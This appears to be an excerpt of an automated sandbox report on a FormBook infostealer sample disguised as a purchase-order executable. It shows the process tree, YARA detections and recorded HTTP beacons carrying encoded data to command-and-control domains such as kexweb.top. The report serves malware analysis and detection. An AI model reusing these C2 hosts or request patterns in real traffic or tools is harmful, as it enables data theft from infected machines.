              Data Raw: 48 30 51 50 36 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 43 73 56 43 51 50 4c 46 55 77 7a 75 47 68 30 44 42 30 46 79 6c 65 33 66 51 58 55 49 4a 6f 56 58 37 33 70 71 65 36 6f 49 32 4b 52 31 61 53 58 30 78 58 70 4b 44 75 47 35 73 51 58 5a 31 4e 78 6a 4f 4e 4d 69 6c 6f 54 64 47 79 33 57 2b 49 77 4c 46 56 73 5a 54 50 6e 32 49 42 37 33 7a 54 4b 75 56 47 62 4f 50 50 64 76 75 4b 4b 67 2b 72 42 47 42 5a 6d 31 73 6c 56 46 4e 58 6c 71 51 61 69 34 59 6a 2f 35 42 2b 57 4f 70 59 69 52 36 46 68 46 6e 50 57 55 7a 61 6a 2f 67 49 50 2f 55 31 66 4e 62 70 32 54 71 64 63 79 2b 6b 69 30 56 61 71 63 73 4c 70 58 59 41 55 5a 44 6a 56 31 4d 37 6c 75 45 55 39 74 77 6f 64 61 4a 63 72 78 63 72 53 39 4b 79 53 55 41 48 53 46 6f 4a 39 64 69 6c 4f 62 65 4a 30 57 70 68 38 6f 44 43 44 61 4f 37 61 52 2f 33 64 76 4b 6c 51 6d 54 72 71 71 51 69 54 67 34 4c 38 4c 5a 6a 74 37 55 4b 51 58 5a 45 71 6d 36 4a 71 70 7a 51 51 37 6a 38 77 74 6f 38 4b 2b 4d 53 [TRUNCATED]
              Data Ascii: H0QP6=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 [TRUNCATED]
              Sep 22, 2024 17:36:20.860364914 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
              Server: nginx
              Date: Sun, 22 Sep 2024 15:36:20 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              16 | 192.168.2.7 | 49726 | 217.70.184.50 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:36:22.800704956 CEST | 568 | OUT | GET /nxfn/?H0QP6=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfUOnUHUTgavpIKdyJZhbpRDfHBgtRvaLwhSA3LIOv4/Kx2UtnF+bA/8x&OXVx9=WNjT HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.languagemodel.pro
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:36:23.407097101 CEST | 1236 | IN | HTTP/1.1 200 OK
              Server: nginx
              Date: Sun, 22 Sep 2024 15:36:23 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Vary: Accept-Encoding
              Vary: Accept-Language
              Data Raw: 37 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 [TRUNCATED]
              Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>languagemodel.pro</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https: [TRUNCATED]
              Sep 22, 2024 17:36:23.407460928 CEST | 914 | IN | Data Raw: 3d 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 73 74 72 6f 6e 67 3e 3c 2f
              Data Ascii: =languagemodel.pro"><strong>View the WHOIS results of languagemodel.pro</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class=


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              17 | 192.168.2.7 | 49727 | 63.250.47.40 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:36:28.662138939 CEST | 819 | OUT | POST /3bdq/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.kexweb.top
              Origin: http://www.kexweb.top
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 218
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.kexweb.top/3bdq/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 76 61 79 57 38 35 50 54 53 4f 58 6c 31 71 6f 4e 63 70 6c 59 32 72 53 6b 72 79 33 66 64 6b 71 72 4d 45 62 71 68 7a 62 59 30 46 59 6e 64 6f 73 4f 41 45 51 71 4b 55 6e 6c 72 72 44 33 6b 5a 35 73 32 41 38 34 6e 6f 45 6e 67 45 77 5a 75 62 70 78 6e 7a 32 4d 6a 6f 4c 54 70 67 4a 42 5a 56 4f 79 44 56 45 6c 34 31 32 44 46 62 48 70 65 63 30 5a 45 51 6d 6d 6d 6c 4c 4f 4d 39 49 73 35 46 33 50 71 37 57 55 4e 78 54 45 63 55 58 4b 57 6c 74 32 4e 6b 78 6c 71 67 77 46 2b 4a 6d 55 76 37 69 5a 63 73 78 53 48 41 4a 4c 72 6f 6a 62 71 62 79 4b 56 72 38 6d 72 30 49 2f 46 79 4a 4f 35 4d 37 41 75 61 71 44 79 77 3d 3d
              Data Ascii: H0QP6=rNrPDBiknVqXvayW85PTSOXl1qoNcplY2rSkry3fdkqrMEbqhzbY0FYndosOAEQqKUnlrrD3kZ5s2A84noEngEwZubpxnz2MjoLTpgJBZVOyDVEl412DFbHpec0ZEQmmmlLOM9Is5F3Pq7WUNxTEcUXKWlt2NkxlqgwF+JmUv7iZcsxSHAJLrojbqbyKVr8mr0I/FyJO5M7AuaqDyw==
              Sep 22, 2024 17:36:29.258941889 CEST | 595 | IN | HTTP/1.1 404 Not Found
              Date: Sun, 22 Sep 2024 15:36:29 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 389
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              18 | 192.168.2.7 | 49728 | 63.250.47.40 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:36:31.215193033 CEST | 839 | OUT | POST /3bdq/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.kexweb.top
              Origin: http://www.kexweb.top
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 238
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.kexweb.top/3bdq/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 65 72 4c 68 6e 71 69 79 62 59 7a 46 59 6e 46 34 73 4c 4f 6b 51 68 4b 55 62 58 72 72 76 33 6b 61 46 73 32 42 4d 34 6d 66 51 34 68 55 77 62 69 37 70 7a 6f 54 32 4d 6a 6f 4c 54 70 67 74 6e 5a 52 61 79 44 6c 30 6c 2b 58 4f 4d 61 72 48 71 4b 4d 30 5a 58 41 6d 69 6d 6c 4b 2b 4d 38 55 53 35 44 7a 50 71 35 65 55 44 41 54 44 46 6b 57 42 59 46 74 34 4f 32 45 41 73 68 55 2b 32 35 6d 61 69 64 43 52 64 61 73 77 64 69 46 6e 31 35 62 67 75 5a 57 38 43 4e 68 54 70 31 4d 6e 49 51 39 76 6d 37 65 71 6a 49 4c 48 6b 50 73 57 37 6e 47 6e 77 59 30 4d 59 2b 2f 6c 35 46 72 4e 56 4a 45 3d
              Data Ascii: H0QP6=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWerLhnqiybYzFYnF4sLOkQhKUbXrrv3kaFs2BM4mfQ4hUwbi7pzoT2MjoLTpgtnZRayDl0l+XOMarHqKM0ZXAmimlK+M8US5DzPq5eUDATDFkWBYFt4O2EAshU+25maidCRdaswdiFn15bguZW8CNhTp1MnIQ9vm7eqjILHkPsW7nGnwY0MY+/l5FrNVJE=
              Sep 22, 2024 17:36:31.828917980 CEST | 595 | IN | HTTP/1.1 404 Not Found
              Date: Sun, 22 Sep 2024 15:36:31 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 389
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              19 | 192.168.2.7 | 49729 | 63.250.47.40 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:36:33.815227985 CEST | 1852 | OUT | POST /3bdq/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.kexweb.top
              Origin: http://www.kexweb.top
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1250
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.kexweb.top/3bdq/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 6d 72 4c 54 66 71 6c 6c 76 59 79 46 59 6e 62 6f 73 4b 4f 6b 51 47 4b 51 33 54 72 72 79 43 6b 63 4a 73 33 6e 77 34 68 72 38 34 72 55 77 62 71 62 70 2b 6e 7a 33 4d 6a 6f 62 58 70 67 39 6e 5a 52 61 79 44 6e 73 6c 70 56 32 4d 59 72 48 70 65 63 30 46 45 51 6d 4b 6d 68 66 47 4d 38 51 43 35 7a 54 50 72 5a 4f 55 42 79 37 44 61 55 57 44 62 46 73 2b 4f 32 59 54 73 68 49 59 32 36 37 50 69 62 79 52 66 4f 68 70 59 54 6c 4b 67 49 62 38 79 71 32 64 4e 66 42 47 77 32 41 4d 41 79 45 49 76 4a 32 73 73 37 33 48 73 36 46 48 73 58 71 59 34 36 35 56 51 35 44 31 73 33 4b 4d 58 64 75 52 78 38 2b 58 6b 56 4b 2b 32 38 5a 73 46 63 2b 34 34 2f 44 5a 31 67 33 65 69 78 43 4b 43 68 78 72 33 67 78 2f 65 62 35 66 37 6f 45 59 50 71 51 4e 66 68 42 77 4d 36 4c 51 72 50 74 4b 61 47 64 47 6e 4d 2f 51 34 63 5a 72 4d 6c 55 59 67 58 57 34 62 66 76 67 2f 47 4e 2f 59 78 62 58 31 6b 45 4d 74 79 30 31 [TRUNCATED]
              Data Ascii: H0QP6= [TRUNCATED]
              Timestamp: Sep 22, 2024 17:36:34.392795086 CEST, Bytes transferred: 595, Direction: IN
              Data:
              HTTP/1.1 404 Not Found
              Date: Sun, 22 Sep 2024 15:36:34 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 389
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session ID: 20, Source IP: 192.168.2.7, Source Port: 49730, Destination IP: 63.250.47.40, Destination Port: 80, PID: 5424, Process: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp: Sep 22, 2024 17:36:36.754654884 CEST, Bytes transferred: 561, Direction: OUT
              Data:
              GET /3bdq/?H0QP6=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv2wVl5tEpDmVzrjnyzZwQXC/AEB58FOwV7HJGPZNP2SejBf9M+4Q+mbI&OXVx9=WNjT HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.kexweb.top
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Timestamp: Sep 22, 2024 17:36:37.347039938 CEST, Bytes transferred: 610, Direction: IN
              Data:
              HTTP/1.1 404 Not Found
              Date: Sun, 22 Sep 2024 15:36:37 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 389
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html; charset=utf-8
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Target ID:0
              Start time:11:34:31
              Start date:22/09/2024
              Path:C:\Users\user\Desktop\PO# Q919240.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\PO# Q919240.exe"
              Imagebase:0x400000
              File size:1'412'827 bytes
              MD5 hash:1CDBBC595757EA5F6E9393D622D66E10
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              Target ID:2
              Start time:11:34:32
              Start date:22/09/2024
              Path:C:\Windows\SysWOW64\svchost.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\PO# Q919240.exe"
              Imagebase:0xb50000
              File size:46'504 bytes
              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1666062406.0000000003890000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1666062406.0000000003890000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1666620197.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1666620197.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              Reputation:high
              Has exited:true

              Target ID:3
              Start time:11:34:44
              Start date:22/09/2024
              Path:C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe"
              Imagebase:0x5e0000
              File size:140'800 bytes
              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2707473694.0000000004430000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2707473694.0000000004430000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
              Reputation:high
              Has exited:false

              Target ID:5
              Start time:11:34:47
              Start date:22/09/2024
              Path:C:\Windows\SysWOW64\netbtugc.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
              Imagebase:0xce0000
              File size:22'016 bytes
              MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2705527913.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2705527913.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              Reputation:moderate
              Has exited:false

              Target ID:6
              Start time:11:35:00
              Start date:22/09/2024
              Path:C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe"
              Imagebase:0x5e0000
              File size:140'800 bytes
              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2709976615.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2709976615.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              Reputation:high
              Has exited:false

              Target ID:10
              Start time:11:35:23
              Start date:22/09/2024
              Path:C:\Program Files\Mozilla Firefox\firefox.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
              Imagebase:0x7ff722870000
              File size:676'768 bytes
              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true


                Execution Graph

                Execution Coverage:3.3%
                Dynamic/Decrypted Code Coverage:0.9%
                Signature Coverage:4.2%
                Total number of Nodes:1896
                Total number of Limit Nodes:36
